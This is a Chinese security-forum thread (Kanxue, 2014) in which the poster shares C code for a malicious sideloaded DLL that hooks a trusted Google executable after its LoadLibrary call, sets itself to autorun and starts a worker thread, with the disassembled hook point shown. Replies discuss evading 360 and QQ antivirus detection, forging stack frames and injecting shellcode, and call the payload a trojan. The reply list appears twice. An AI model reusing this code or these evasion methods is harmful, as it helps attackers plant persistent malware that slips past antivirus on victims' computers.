[原创]闲得无聊，发个白加黑利用代码-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创]闲得无聊，发个白加黑利用代码

发表于: 2014-12-1 17:40 25033

[原创]闲得无聊，发个白加黑利用代码

anywhere杨

2014-12-1 17:40

25033


void MyDevice()
{
	//MessageBox(0,_T("1111"),_T("1111"),MB_OK);
	HANDLE hEv=CreateEvent(NULL,true,false,_T(EVENT_NAME));
	if(hEv!=NULL)
	{
		SetEvent(hEv);
		CloseHandle(hEv);
	}
	TCHAR szCurrentModleName[MAX_PATH];
	GetModuleFileName(0,szCurrentModleName,MAX_PATH);
	SetSelfAutoRun(szCurrentModleName);
	HANDLE hThread =(HANDLE) _beginthreadex(NULL,NULL,MyThreadProc,NULL,NULL,NULL);
	while(TRUE)
	{
		Sleep(1000);
	}
}
void JmpFunc()
{
	DWORD dwHookCodeAddr = (DWORD)GetModuleHandle(NULL)+0x100B;
	HookAddrCall(dwHookCodeAddr,(DWORD)MyDevice);
}
BOOL WINAPI DllMain(
	HINSTANCE hinstDLL,  // handle to the DLL module
	DWORD fdwReason,     // reason for calling function
	LPVOID lpvReserved   // reserved
	)
{
	switch(fdwReason)
	{
	case DLL_PROCESS_ATTACH:
		hModule=(HMODULE)hinstDLL;
		JmpFunc();
		break;
	case DLL_THREAD_ATTACH:
		break;
	case DLL_THREAD_DETACH:
		break;
	case DLL_PROCESS_DETACH:
		break;
	}

	return true;
}

HOOK 点：

00211000  /$  68 ACF82100 PUSH GoogleWa.0021F8AC                ; /FileName = "chrome_frame_helper.dll"
00211005  |.  FF15 30D02100 CALL DWORD PTR DS:[<&KERNEL32.LoadLibrar>; \LoadLibraryW
0021100B  |.  8906       MOV DWORD PTR DS:[ESI],EAX
0021100D  |.  85C0       TEST EAX,EAX
0021100F  |.  74 1F       JE SHORT GoogleWa.00211030

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

收藏・26

免费・0

支持

最新回复 (37) 1 2 ▶
人在塔在雪币： 144 活跃值： (335) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 391 粉丝 3 关注私信	人在塔在 2 楼黑dll中hook白exe的LoadLibrary之后的代码去写启动然后创建木马工作线程么，为什么这样360就不拦了呢 2014-12-1 18:19 0
rqqeq 雪币： 11 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 908 粉丝 0 关注私信	rqqeq 3 楼过栈回溯其实还有别的玩法 2014-12-1 19:02 0
人在塔在雪币： 144 活跃值： (335) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 391 粉丝 3 关注私信	人在塔在 4 楼哦哦，这样啊，360检测的是写启动的函数的栈桢吗？那么是不是也可以像过游戏的call一样构造个假栈桢呢？ 2014-12-1 19:11 0
CRoot 雪币： 3366 活跃值： (1363) 能力值： ( LV4，RANK：40 ) 在线值：发帖 24 回帖 741 粉丝 6 关注私信	CRoot 5 楼 SetSelfAutoRun()是什么东东? 2014-12-1 20:43 0
人在塔在雪币： 144 活跃值： (335) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 391 粉丝 3 关注私信	人在塔在 6 楼这种方法是不是不通用啊？我用那个暴风的dll劫持的exe .text:0040117A push offset s->__Stormplayer_dll ; "..\\StormPlayer.dll" .text:0040117F lea edx, [ebp+LibFileName] .text:00401185 push edx ; pszPath .text:00401186 call ds:PathAppendW .text:00401186 .text:0040118C call ds:GetTickCount .text:0040118C .text:00401192 push 8 ; dwFlags .text:00401194 mov ebx, eax .text:00401196 push 0 ; hFile .text:00401198 lea eax, [ebp+LibFileName] .text:0040119E push eax ; lpLibFileName .text:0040119F call ds:LoadLibraryExW .text:0040119F .text:004011A5 mov esi, eax //hook的这一句然后在hookfunc中写启动还是被拦截了，dll是没被杀的换个其他的程序就可以了，谢谢楼主分享 2014-12-2 09:50 0
DENGXINSD 雪币： 55 活跃值： (75) 能力值： ( LV5，RANK：70 ) 在线值：发帖 5 回帖 81 粉丝 1 关注私信	DENGXINSD 1 7 楼 shellcode运行。而且是在dllmain函数中，不好！更好的方式是在导出函数中执行JmpFunc 。而且是白的主动调用执行的｜ 2014-12-2 09:59 0
xinxinqing 雪币： 1234 活跃值： (302) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 390 粉丝 0 关注私信	xinxinqing 8 楼不错的方法，学习了 2014-12-2 13:49 0
rqqeq 雪币： 11 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 908 粉丝 0 关注私信	rqqeq 9 楼是的，这种更好 2014-12-2 19:03 0
人在塔在雪币： 144 活跃值： (335) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 391 粉丝 3 关注私信	人在塔在 10 楼为什么我觉得没区别。- -，dllmain中只是hook，代码的执行调用来源都一样啊 call hookfunc跟call dll的导出函数有区别吗 2014-12-2 19:13 0
落笔飞花雪币： 719 活跃值： (777) 能力值： ( LV8，RANK：120 ) 在线值：发帖 70 回帖 458 粉丝 61 关注私信	落笔飞花 1 11 楼请问你说的是EATHOOK 吗？ 2014-12-2 19:16 0
anywhere杨雪币： 110 活跃值： (527) 能力值： ( LV4，RANK：40 ) 在线值：发帖 56 回帖 423 粉丝 3 关注私信	anywhere杨 12 楼你说的是QQ管家吗？ 2014-12-9 10:02 0
wping 雪币： 212 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 88 回帖 386 粉丝 0 关注私信	wping 13 楼请问楼主这个东东 ring3下能玩不 2014-12-9 10:15 0
anywhere杨雪币： 110 活跃值： (527) 能力值： ( LV4，RANK：40 ) 在线值：发帖 56 回帖 423 粉丝 3 关注私信	anywhere杨 14 楼这就是r3下的东东。 2014-12-9 10:22 0
anywhere杨雪币： 110 活跃值： (527) 能力值： ( LV4，RANK：40 ) 在线值：发帖 56 回帖 423 粉丝 3 关注私信	anywhere杨 15 楼这本来就是白的主动调用执行。。只是代码在dll里面而已。 2014-12-9 10:23 0
落笔飞花雪币： 719 活跃值： (777) 能力值： ( LV8，RANK：120 ) 在线值：发帖 70 回帖 458 粉丝 61 关注私信	落笔飞花 1 16 楼我理解错了看来。。我自己构建了一个shellcode然后写入到加载后的代码最后 Eip回去执行，。。特么的。。累死我了这几天。。。这样代码到是跑到宿主进程去了。。但是显而易见的蛋疼菊紧。。。 2014-12-9 22:52 0
落笔飞花雪币： 719 活跃值： (777) 能力值： ( LV8，RANK：120 ) 在线值：发帖 70 回帖 458 粉丝 61 关注私信	落笔飞花 1 17 楼我看着帖子看着帖子就看错了。。然后就错了几天。。。。我把代码写成shellcode然后写入程序最后修改eip执行。。。累死我了擦。。。 2014-12-9 22:55 0
anhkgg 雪币： 10072 活跃值： (3008) 能力值： ( LV15，RANK：515 ) 在线值：发帖 28 回帖 117 粉丝 92 关注私信	anhkgg 7 18 楼兄台，表示没看懂，可否讲解一下，黑dll是如何被加载的？ 2014-12-15 11:03 0
mumaren 雪币： 71 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 659 粉丝 0 关注私信	mumaren 19 楼感谢分享谢谢 2014-12-15 12:04 0
落笔飞花雪币： 719 活跃值： (777) 能力值： ( LV8，RANK：120 ) 在线值：发帖 70 回帖 458 粉丝 61 关注私信	落笔飞花 1 20 楼 LoadLibrary大洞法。如果你有绕过父进程的方法也麻烦回复一下。 2014-12-15 12:07 0
Anzun 雪币： 5 活跃值： (108) 能力值： ( LV2，RANK：10 ) 在线值：发帖 44 回帖 300 粉丝 1 关注私信	Anzun 21 楼我想知道这个和1楼的代码有什么区别吗？代码注入到白名单的程序不会被拦截什么远程注入什么的吗？难道是在白名单程序没有启动的情况下将SHELLCODE写到程序里面去？ 2014-12-15 14:57 0
anhkgg 雪币： 10072 活跃值： (3008) 能力值： ( LV15，RANK：515 ) 在线值：发帖 28 回帖 117 粉丝 92 关注私信	anhkgg 7 22 楼可否留个qq，聊聊 2014-12-16 14:43 0
落笔飞花雪币： 719 活跃值： (777) 能力值： ( LV8，RANK：120 ) 在线值：发帖 70 回帖 458 粉丝 61 关注私信	落笔飞花 1 23 楼 QQ1595239682 2014-12-16 18:56 0
echotxl 雪币： 8 活跃值： (36) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 40 粉丝 0 关注私信	echotxl 24 楼这个学习一下。。 2015-1-6 20:23 0
我是谁！雪币： 115 活跃值： (23) 能力值： (RANK：20 ) 在线值：发帖 45 回帖 420 粉丝 1 关注私信	我是谁！ 25 楼这个很有研究的价值！！！！ 2015-7-20 17:28 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

anywhere杨

发帖

423

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (37) 1 2 ▶
人在塔在雪币： 144 活跃值： (335) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 391 粉丝 3 关注私信	人在塔在 2 楼黑dll中hook白exe的LoadLibrary之后的代码去写启动然后创建木马工作线程么，为什么这样360就不拦了呢 2014-12-1 18:19 0
rqqeq 雪币： 11 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 908 粉丝 0 关注私信	rqqeq 3 楼过栈回溯其实还有别的玩法 2014-12-1 19:02 0
人在塔在雪币： 144 活跃值： (335) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 391 粉丝 3 关注私信	人在塔在 4 楼哦哦，这样啊，360检测的是写启动的函数的栈桢吗？那么是不是也可以像过游戏的call一样构造个假栈桢呢？ 2014-12-1 19:11 0
CRoot 雪币： 3366 活跃值： (1363) 能力值： ( LV4，RANK：40 ) 在线值：发帖 24 回帖 741 粉丝 6 关注私信	CRoot 5 楼 SetSelfAutoRun()是什么东东? 2014-12-1 20:43 0
人在塔在雪币： 144 活跃值： (335) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 391 粉丝 3 关注私信	人在塔在 6 楼这种方法是不是不通用啊？我用那个暴风的dll劫持的exe .text:0040117A push offset s->__Stormplayer_dll ; "..\\StormPlayer.dll" .text:0040117F lea edx, [ebp+LibFileName] .text:00401185 push edx ; pszPath .text:00401186 call ds:PathAppendW .text:00401186 .text:0040118C call ds:GetTickCount .text:0040118C .text:00401192 push 8 ; dwFlags .text:00401194 mov ebx, eax .text:00401196 push 0 ; hFile .text:00401198 lea eax, [ebp+LibFileName] .text:0040119E push eax ; lpLibFileName .text:0040119F call ds:LoadLibraryExW .text:0040119F .text:004011A5 mov esi, eax //hook的这一句然后在hookfunc中写启动还是被拦截了，dll是没被杀的换个其他的程序就可以了，谢谢楼主分享 2014-12-2 09:50 0
DENGXINSD 雪币： 55 活跃值： (75) 能力值： ( LV5，RANK：70 ) 在线值：发帖 5 回帖 81 粉丝 1 关注私信	DENGXINSD 1 7 楼 shellcode运行。而且是在dllmain函数中，不好！更好的方式是在导出函数中执行JmpFunc 。而且是白的主动调用执行的｜ 2014-12-2 09:59 0
xinxinqing 雪币： 1234 活跃值： (302) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 390 粉丝 0 关注私信	xinxinqing 8 楼不错的方法，学习了 2014-12-2 13:49 0
rqqeq 雪币： 11 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 908 粉丝 0 关注私信	rqqeq 9 楼是的，这种更好 2014-12-2 19:03 0
人在塔在雪币： 144 活跃值： (335) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 391 粉丝 3 关注私信	人在塔在 10 楼为什么我觉得没区别。- -，dllmain中只是hook，代码的执行调用来源都一样啊 call hookfunc跟call dll的导出函数有区别吗 2014-12-2 19:13 0
落笔飞花雪币： 719 活跃值： (777) 能力值： ( LV8，RANK：120 ) 在线值：发帖 70 回帖 458 粉丝 61 关注私信	落笔飞花 1 11 楼请问你说的是EATHOOK 吗？ 2014-12-2 19:16 0
anywhere杨雪币： 110 活跃值： (527) 能力值： ( LV4，RANK：40 ) 在线值：发帖 56 回帖 423 粉丝 3 关注私信	anywhere杨 12 楼你说的是QQ管家吗？ 2014-12-9 10:02 0
wping 雪币： 212 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 88 回帖 386 粉丝 0 关注私信	wping 13 楼请问楼主这个东东 ring3下能玩不 2014-12-9 10:15 0
anywhere杨雪币： 110 活跃值： (527) 能力值： ( LV4，RANK：40 ) 在线值：发帖 56 回帖 423 粉丝 3 关注私信	anywhere杨 14 楼这就是r3下的东东。 2014-12-9 10:22 0
anywhere杨雪币： 110 活跃值： (527) 能力值： ( LV4，RANK：40 ) 在线值：发帖 56 回帖 423 粉丝 3 关注私信	anywhere杨 15 楼这本来就是白的主动调用执行。。只是代码在dll里面而已。 2014-12-9 10:23 0
落笔飞花雪币： 719 活跃值： (777) 能力值： ( LV8，RANK：120 ) 在线值：发帖 70 回帖 458 粉丝 61 关注私信	落笔飞花 1 16 楼我理解错了看来。。我自己构建了一个shellcode然后写入到加载后的代码最后 Eip回去执行，。。特么的。。累死我了这几天。。。这样代码到是跑到宿主进程去了。。但是显而易见的蛋疼菊紧。。。 2014-12-9 22:52 0
落笔飞花雪币： 719 活跃值： (777) 能力值： ( LV8，RANK：120 ) 在线值：发帖 70 回帖 458 粉丝 61 关注私信	落笔飞花 1 17 楼我看着帖子看着帖子就看错了。。然后就错了几天。。。。我把代码写成shellcode然后写入程序最后修改eip执行。。。累死我了擦。。。 2014-12-9 22:55 0
anhkgg 雪币： 10072 活跃值： (3008) 能力值： ( LV15，RANK：515 ) 在线值：发帖 28 回帖 117 粉丝 92 关注私信	anhkgg 7 18 楼兄台，表示没看懂，可否讲解一下，黑dll是如何被加载的？ 2014-12-15 11:03 0
mumaren 雪币： 71 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 659 粉丝 0 关注私信	mumaren 19 楼感谢分享谢谢 2014-12-15 12:04 0
落笔飞花雪币： 719 活跃值： (777) 能力值： ( LV8，RANK：120 ) 在线值：发帖 70 回帖 458 粉丝 61 关注私信	落笔飞花 1 20 楼 LoadLibrary大洞法。如果你有绕过父进程的方法也麻烦回复一下。 2014-12-15 12:07 0
Anzun 雪币： 5 活跃值： (108) 能力值： ( LV2，RANK：10 ) 在线值：发帖 44 回帖 300 粉丝 1 关注私信	Anzun 21 楼我想知道这个和1楼的代码有什么区别吗？代码注入到白名单的程序不会被拦截什么远程注入什么的吗？难道是在白名单程序没有启动的情况下将SHELLCODE写到程序里面去？ 2014-12-15 14:57 0
anhkgg 雪币： 10072 活跃值： (3008) 能力值： ( LV15，RANK：515 ) 在线值：发帖 28 回帖 117 粉丝 92 关注私信	anhkgg 7 22 楼可否留个qq，聊聊 2014-12-16 14:43 0
落笔飞花雪币： 719 活跃值： (777) 能力值： ( LV8，RANK：120 ) 在线值：发帖 70 回帖 458 粉丝 61 关注私信	落笔飞花 1 23 楼 QQ1595239682 2014-12-16 18:56 0
echotxl 雪币： 8 活跃值： (36) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 40 粉丝 0 关注私信	echotxl 24 楼这个学习一下。。 2015-1-6 20:23 0
我是谁！雪币： 115 活跃值： (23) 能力值： (RANK：20 ) 在线值：发帖 45 回帖 420 粉丝 1 关注私信	我是谁！ 25 楼这个很有研究的价值！！！！ 2015-7-20 17:28 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复